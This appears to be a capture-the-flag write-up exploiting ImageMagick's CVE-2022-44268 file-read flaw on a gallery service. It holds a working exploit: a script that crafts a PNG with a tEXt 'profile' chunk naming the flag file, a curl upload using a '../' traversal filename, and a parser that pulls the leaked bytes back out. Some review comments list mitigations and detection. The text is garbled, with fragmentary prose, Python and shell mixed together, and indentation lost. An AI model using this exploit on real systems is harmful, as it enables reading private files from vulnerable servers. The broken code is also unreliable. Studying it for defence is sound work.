
The council's top priority is to protect the flag, no matter the cost. Oh hey look, it's a photo gallery. What could go wrong?
profile as a filename during operations like resize, embedding the file bytes into the processed image (CVE-2022-44268).

References:
http://play.scriptsorcerers.xyz:10265

tEXt key `profile` and value set to the absolute flag path (no `@`).

import struct, zlib, binascii
def chunk(t,d):
    """Serialise one PNG chunk.

    Layout is the one the PNG spec fixes: 4-byte big-endian data length, the
    4-byte chunk type ``t``, the data ``d``, then a CRC-32 computed over
    type+data (the length field is not covered by the CRC).
    """
    body = t + d
    length_field = struct.pack('>I', len(d))
    # crc32 is already unsigned on Python 3; the mask keeps the value in 32 bits either way.
    crc_field = struct.pack('>I', binascii.crc32(body) & 0xffffffff)
    return length_field + body + crc_field
# Minimal 1x1 image so a converter has something valid to process.
# IHDR fields: width, height, bit depth, colour type (6 = truecolour+alpha), compression, filter, interlace.
sig=b'\x89PNG\r\n\x1a\n'; ihdr=struct.pack('>IIBBBBB',1,1,8,6,0,0,0)
# One scanline: filter-type byte 0 followed by a single 4-byte pixel.
idat=zlib.compress(b'\x00\xff\xff\xff\xff')
# The CVE-2022-44268 trigger: a tEXt chunk whose keyword is `profile`. An unpatched
# ImageMagick interprets the value as a path and copies that file's bytes into the image
# it writes out (the hex block in the observed output further down is that copy).
# NOTE(review): server-side mitigations are a patched ImageMagick, stripping text chunks
# from untrusted uploads before any conversion, and a restrictive policy.xml; detection is
# a scan of processed images for text chunks that were not present in the upload.
text=b'profile'+b'\x00'+b'/home/chall/flag.txt' # absolute path, no '@'
# Chunk order: IHDR, tEXt, IDAT, IEND.
png=sig+chunk(b'IHDR',ihdr)+chunk(b'tEXt',text)+chunk(b'IDAT',idat)+chunk(b'IEND',b'')
# NOTE(review): the handle is never closed explicitly; `with open(...) as fh:` is the idiom.
open('leak_flag.png','wb').write(png)
BASE='http://play.scriptsorcerers.xyz:10265'
# Upload the crafted PNG. The multipart filename field is entirely client-controlled (here it
# carries a `..` component), so a server must never derive a storage path from it: generate
# the stored name server-side and validate the image before any conversion step.
curl -sS -F 'file=@leak_flag.png;type=image/png;filename=../logo.png' "$BASE/upload"
# Fetch the server-side processed copy (presumably the resized gallery image) for inspection.
curl -sS "$BASE/logo-sm.png" -o out.png
import io, re, zlib
b=open('out.png','rb').read(); f=io.BytesIO(b); assert f.read(8)==b'\x89PNG\r\n\x1a\n'
out=[]
while True:
lb=f.read(4)
if not lb: break
L=int.from_bytes(lb,'big'); T=f.read(4); D=f.read(L); f.read(4)
if T==b'tEXt':
try: out.append(D.split(b'\x00',1)[1].decode('utf-8','ignore'))
except: pass
elif T==b'zTXt':
try:
_,rest=D.split(b'\x00',1)
if rest[:1]==b'\x00': out.append(zlib.decompress(rest[1:]).decode('utf-8','ignore'))
except: pass
elif T==b'iTXt':
p=D.split(b'\x00',5)
if len(p)>=6:
_,cf,_,_,_,txt=p
if cf==b'\x01':
try: txt=zlib.decompress(txt)
except: pass
out.append(txt.decode('utf-8','ignore'))
elif T==b'iCCP':
try:
_,rest=D.split(b'\x00',1)
if rest[:1]==b'\x00': out.append(zlib.decompress(rest[1:]).decode('utf-8','ignore'))
except: pass
if T==b'IEND': break
text='\n'.join(out)
m=re.search(r'scriptCTF\{[^}]+\}', text)
print(m.group(0) if m else text[:800])
Observed output contained a hex block that decodes to the flag:
7363726970744354467b7430305f6d7563685f6d343669635f6566336336366232313464657d0a
=> scriptCTF{t00_much_m46ic_ef3c66b214de}
scriptCTF{t00_much_m46ic_ef3c66b214de}